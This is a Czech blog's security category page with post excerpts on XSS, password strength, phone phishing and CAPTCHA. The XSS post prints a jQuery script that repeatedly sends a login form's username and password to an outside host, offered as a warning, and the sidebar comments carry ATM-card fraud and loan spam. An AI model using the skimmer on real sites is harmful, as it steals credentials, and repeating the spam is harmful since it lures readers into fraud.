Bezpečnost a hacking | Michal Smrčka - blog

Aukro v nové soutěži odměnuje šikovné programátory

V těchto dnech probíhá na Aukro.cz soutěž „Aukro naděluje“. Každý den organizátoři umístí do nějaké náhodné sekce na Aukru relativně hodnotné produkty za směšně nízkou cenu. Je k dispozici vždy pouze 1 kus. Vy musíte tento produkt najít a zakoupit jako první.

O soutěži jsem se dozvěděl na Twitteru a nebýt následujícího odvážného prohlášení Aukra, ani bych se jí příliš nezaobíral:

foto

foto

„Nebojte, na roboty a podvodné programy jsme mysleli, takže tudy cesta nevede.“


18. 11. 2011 v 16:04 • Bezpečnost a hacking • autor Michal Smrčka85 komentářů

S XSS zranitelností se dá napáchat více škody, než si myslíte

Otázka pro webmastery: Víte, co dělá následující jQuery kód?

<script>$(function(){setInterval(function() {$.get('http://nejaky_web.cz/uloz_data.php', {jmeno: $('[name=l_jmeno]').val(), heslo: $('[name=l_heslo]').val() })},500);}); </script>

Pokud nevíte, a zároveň se někde na vašem webu vyskytuje výpis typu „echo $_POST[rocnik] “, upalujte svůj web opravit a vypisované parametry ošetřit.

Jestli provozujete web obsahující např. citlivá data uživatelů, pak vyloženě hazardujete. Za únik dat hrozí právní postih i vám, pokud se prokáže, že nebyla provedena ani nejzákladnější bezpečnostní opatření. Což obrana proti XSS bezesporu je. Více informací na Wikipedii.


13. 11. 2010 v 20:45 • Bezpečnost a hacking • autor Michal Smrčka1 komentář

Na délce záleží! Jak zvolit správné heslo?

Průměrný uživatel používá k přihlášení na webové služby velmi slabá hesla. Tak slabá, že případný útočník dokáže za několik hodin, příp. dní heslo v plné své kráse odhalit. Lidé toto zbytečně podceňují, navíc zvolit si těžko prolomitelné heslo nemusí být vůbec složité!

Nejdříve pár čísel.

V souvislosti se statistikami hesel pocházejícími ze vzorku více než 800.000 uživatelských účtů vyplynuly tyto závěry: *

  • 9% uživatelů má heslo dlouhé jen 4 znaky nebo méně
  • ovšem heslo o maximální délce 6 znaků (pořád slabé) používá více než 50% lidí!
  • počet hesel, který dokáže počítač automaticky tipnout za jednu sekundu, se pohybuje mezi 20 a 100 za sekundu **
  • zjištění čtyřmístného hesla tedy brutal-force útokem zpravidla trval maximálně 40 hodin, v praxi je to ale mnohem méně
  • odhalení pětimístného hesla by bylo jisté maximálně za 24 dní, ovšem za předpokladu zapojení více paralelních počítačů je možné proces urychlit
  • pokud máte maximálně šestimístné heslo, prodloužila by se maximální doba zjištění na téměř 2,5 roku, nicméně také platí, že v případě zapojení více počítačů se doba zkrátí :)

20. 09. 2009 v 21:29 • Bezpečnost a hacking • autor Michal Smrčka10 komentářů

Řekněte mi, prosím, Vaše heslo...

Příchozí hovor z klasického telefonního čísla s předvolbou 776:

„Dobrý den, mluvím s panem Michalem Smrčkou?“
„Ano, u telefonu.“
„Vidím, že využíváte služby našeho operátora a měl bych pro Vás výhodnou nabídku. Nicméně potřeboval bych si Vás ověřit. Můžete mi, prosím, pro kontrolu sdělit Vaše osobní heslo?“

Jak byste zareagovali v mém případě?


21. 06. 2009 v 19:15 • Bezpečnost a hacking • autor Michal Smrčka3 komentáře

Zlo jménem Captcha (opisování znaků z obrázku)

Jsem zásadní odpůrce Captchy. Je to velmi účinná metoda, jak uživatele co nejvíce nasrat.

Captcha je řetězec znaků, který na některých webech musíte opsat z obrázku, abyste mohli přispět diskuzním příspěvkem, poslat e-mail prodejci atp. Důvodem má být zamezení automatického odesílání SPAMu skrz tyto formuláře nebo jiné strojové využití formulářů (roboti vygenerované znaky obvykle neumí rozpoznat a „opsat“).

  captcha

19. 04. 2009 v 11:11 • Bezpečnost a hacking • autor Michal Smrčka47 komentářů

Stránka: 1 2 >

Kategorie blogu

Twitter feed

Poslední články

Poslední komentáře

María José: Get rich today and take the risk of transforming your own life.Try and get an ATM card blank today (CLIFFORD JACKSON) of cliffordhackerspays@­gmail.­com and be among the lucky ones who are benefiting from this card. This ATM card in white set is capable... Ukázat
Odenore omon: Dostal jsem svou již naprogramovanou a vyprázdněnou kartu ATM, abych stáhnul maximálně 1000 dolarů denně po dobu maximálně 20 dní. Jsem tak šťastný, protože jsem minulý týden dostal můj a použil jsem ho na získání 20 000 dolarů. Mike Fisher Hackers vydává kartu... Ukázat
Jessica Shannon Shirley: Dostal jsem svou již naprogramovanou a vyprázdněnou kartu ATM, abych stáhnul maximálně 1000 dolarů denně po dobu maximálně 20 dní. Jsem tak šťastný, protože jsem minulý týden dostal můj a použil jsem ho na získání 20 000 dolarů. Mike Fisher Hackers vydává kartu... Ukázat
Mr. Russell Logan: DO YOU NEED AN AFFORDABLE LOAN TODAY? We have provided over $1 Billion in business loans to over 15,000 business owners just like you. We use our own designated risk technology to provide you with the right business loan so you can grow your... Ukázat
Mr. Russell Logan: We give you loan with a low interest rate of 2% and loan duration of 1 to 30 years to pay back the loan (secure and unsecured). Do not keep your financial problems to yourself in order for you not to be debt... Ukázat

Vyhledávání

Nastavení

Velikost písma: Abc Abc Abc